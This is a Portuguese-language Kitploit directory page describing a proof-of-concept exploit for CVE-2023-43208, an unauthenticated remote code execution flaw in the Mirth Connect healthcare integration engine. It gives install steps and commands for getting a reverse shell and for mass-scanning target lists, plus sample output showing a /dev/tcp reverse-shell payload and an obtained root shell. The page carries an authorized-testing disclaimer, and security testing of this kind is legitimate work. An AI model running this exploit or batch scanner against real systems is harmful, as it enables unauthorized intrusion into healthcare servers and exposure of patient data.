Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43208 — Um exploit de PoC para CVE-2023-43208 - Mirth Connect Execução Remota de Código (RCE) | Kitploit
Ferramentas/GitHubGitHub/4nuxd/cve-2023-43208
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

Um exploit de PoC para CVE-2023-43208 - Mirth Connect Execução Remota de Código (RCE)

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43208 — Mirth Connect RCE

Python CVE Platform

Exploit de Prova de Conceito para CVE-2023-43208, uma vulnerabilidade de Execução Remota de Código não autenticada em Mirth Connect versões anteriores a 4.4.1.


Descrição

Mirth Connect é um motor de integração de saúde de código aberto amplamente implantado. Esta vulnerabilidade explora uma falha de desserialização Java através do endpoint /api/users usando um payload XML malicioso que encadeia gadgets do Apache Commons Collections para alcançar RCE não autenticado.

A versão melhorada substitui o listener original pwncat por um shell PTY interativo totalmente livre de dependências usando apenas builtins do Python (socket, select, tty, termios). O shell é automaticamente atualizado para um PTY completo na conexão.


Versões Afetadas

SoftwareVersões VulneráveisVersão Corrigida
Mirth Connect< 4.4.14.4.1+

Recursos

  • Detecção automática de instância Mirth Connect
  • Identificação de versão e verificação de vulnerabilidade
  • RCE não autenticado via payload de desserialização XML
  • Atualização automática do shell para PTY (fallback python3/python/script)
  • Propagação correta do tamanho do terminal (stty rows/cols)
  • Scanner em lote com suporte a multi-threading
  • Exportar alvos vulneráveis para arquivo
  • Sem dependência pwncat — apenas stdlib para o listener

Instalação

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

Requisitos

root@kitploit:~
requests
packaging
rich
alive-progress

Uso

Alvo Único — Obter um Shell

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

Alvo Único — Com ngrok / Porta de Bind

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

Varredura em Lote a partir de Arquivo

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

Argumentos


Exemplo de Saída

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

Aviso Legal

Esta ferramenta é destinada apenas para testes de penetração autorizados e fins educacionais.
O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.
Os autores não são responsáveis por qualquer uso indevido ou danos causados por esta ferramenta.


Créditos

  • Codificado por: K3ysTr0K3R e Chocapikk
  • Melhorado por: 4nuxd
Baixar ferramenta
FlagDescrição
-u, --urlURL do alvo
-lh, --lhostSeu IP de escuta
-lp, --lportSua porta de escuta
-bp, --bindportSubstituição de porta de bind (útil com ngrok)
-f, --fileArquivo contendo lista de URLs alvo
-o, --outputSalvar alvos vulneráveis em arquivo
-t, --threadsNúmero de threads para varredura (padrão: 50)